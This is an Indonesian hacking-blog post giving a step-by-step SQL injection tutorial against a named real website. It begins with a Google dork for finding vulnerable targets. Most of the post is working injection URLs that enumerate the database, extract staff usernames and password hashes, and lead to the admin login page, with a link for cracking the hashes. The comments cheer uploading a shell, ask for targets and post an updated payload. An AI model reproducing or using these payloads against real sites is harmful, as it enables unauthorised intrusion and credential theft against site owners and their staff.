Langsung saja mas broo,..
Dork : "inurl:content.php?id=" site:info
Untuk Dork masih banyak yang lain, dan akan ada di postingan berikutnya :D
Untuk target kali ini >> http://www.mirbg.info/content.php?id=23
Tambah string ' (tanda kutip ganda) di akhir Url, jika vuln maka akan ada tulisan seperti ini Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/mirbg/public_html/content.php on line 9
http://www.mirbg.info/content.php?id=23'
http://www.mirbg.info/content.php?id=23 order by 1-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 2-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 3-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 4-- (Erorr)
Kesimpulannya kita mengambil yang 3 atau table nya berjumlah 3 :D
Selanjutnya lakukan dengan perintah union all select
http://www.mirbg.info/content.php?id=-23 union all select 1,2,3--
Lihat angka berapa yang kita dapat =))
Kebetulan muncul angka 2 mas broo,.. ayo lanjutkan !!
Next... kita musti mengetahui versi web tersebut,. dengan perintah version() atau @@version
http://www.mirbg.info/content.php?id=-23 union all select 1,version(),3--
ok next..
Mencari table dengan perintah table_name dan di akhir url tambah from information_schema.tables--
http://www.mirbg.info/content.php?id=-23 union all select 1,table_name,3 from information_schema.tables--
dengan perintah group_concat dan di akhir url tambah ini where table_schema=database()--
http://www.mirbg.info/content.php?id=-23 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--
TBL_TEXTS_SEQ,tbl_articles,tbl_content,tbl_form1,tbl_form2,
tbl_languages,tbl_staff,tbl_staff_sessions,tbl_texts,tbl_words
kita buka table yang penting-penting saja (biasanya untuk login)
Sebelum meng inject anda harus menubah table tersebut ke hexa decimal
contoh kita mengambil tbl_staff dan hexadecimalnya adalah 74626c5f7374616666
Jadi >>
http://www.mirbg.info/content.php?id=-23 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x74626c5f7374616666--
isi dari tbl_staff
s_id,s_name,s_login,s_pass,s_admin,s_id,s_name,s_login,s_pass,s_admin
Lihat isi column dengan perintah concat_ws(table_yang_berisi_user_dan_pass)
di akhir url from nama_table_berasal--
http://www.mirbg.info/content.php?id=-23 union all select 1,concat_ws(0x3a,s_login,0x3a,s_pass),3 from tbl_staff
Lihat dan nikmati apa yang kamu dapatkan, :D
Lanjutkan dengan mencari login page
http://www.mirbg.info/admin/index.php
dan untuk password admin, biasanya harus di deckrypt dulu di MD5 Decrypter
Keterangan :
MD5 Decrypter --> http://www.md5decrypter.co.uk/
Converter string to Hexa ---> http://www.string-functions.com/string-hex.aspx
Maaf kalu berantakan :P
Terkait
Hacking
- Hacking Tools : Penetration Testing Tools
- Tutorial Blind SQL Injection Versi 4
- Base SQL Injection
- Free Download Havij v1.16 Portable Cracked
- Reported Attack Site ( Malware )
- Tutorial Patch Bug Sql Injection (Patch Your System)
- Google Dork Carder 2012
- Tanam BackDoor di Website Joomla
- Upload Shell atau BackDoor Di Website Wordpress Part 2
- Upload Shell Di Website Wordpress Part 1
- Deface Page Generator V1.0
- Deckript Password Md5 dengan CainAble
- Tak Bisa Menemukan letak Shell Yang Sudah Kita Tanam
- Melihat Domain dan User Yang Satu Server
- Jumping Server di perm drwxr-xr-x Atau Read Only
- Setan dari Surga Owned You
- Google Dork RFI 2012 (Remote File Inclusion)
- Hack Facebook dengan Halaman Fake Login
- Google Dork Joomla Scan Pake V6
- Google Dork Asp 2012 (sql Injection)
- Forgot Your Password Facebook.com (Hack Facebook dengan cara Forgot Password)
- Tutorial Hacking Website dengan metode RFD(Remote File Disclosure)
- Google Dork Sql Injection, LFI 2012
Tutorial
- Cara Membuat Blog Terbaru
- Cara Membuat Blog SEO Terbaru
- Tutorial Blind SQL Injection Versi 4
- Base SQL Injection
- Tutorial Patch Bug Sql Injection (Patch Your System)
- Mendapatkan Domain Gratis .in
- Tanam BackDoor di Website Joomla
- Upload Shell atau BackDoor Di Website Wordpress Part 2
- Upload Shell Di Website Wordpress Part 1
- Mengetahui Teman Yang Telah Menghapus Pertemanan Anda Di Facebook
- Tak Bisa Menemukan letak Shell Yang Sudah Kita Tanam
- Melihat Domain dan User Yang Satu Server
- Jumping Server di perm drwxr-xr-x Atau Read Only
- Hack Facebook dengan Halaman Fake Login
- Script Virus .bat Sederhana
- Forgot Your Password Facebook.com (Hack Facebook dengan cara Forgot Password)
- Tutorial Hacking Website dengan metode RFD(Remote File Disclosure)
- Auto/Bom Like Status atau Comment Di Facebook
- Mengetahui Driver yang Belum terinstall pada Laptop atau PC Anda
Sql Injections
Mantap... next.. uploud shell ya lagi.. haha :)
ReplyDeletewkwkwkkwkw =))
ReplyDelete^_^
ReplyDeleteheheheheheh
Jangan Lupa bagi target bg :*
ReplyDeletetrus klo pengen tau web target versi berapa , gimana gan?
ReplyDeletemaklum newbie hehehe
http://www.mirbg.info/content.php?id=23 order by 4-- (Erorr)
ReplyDeletebagian ini errornya kayak gimana om?? gambarnya :D
itu udah lama om, ini yg baru
ReplyDeletehttp://www.mirbg.info/content.php?id=-23%20union%20all%20select%201,2,3,4,5,6--
Jadi tablenya ada 6 :P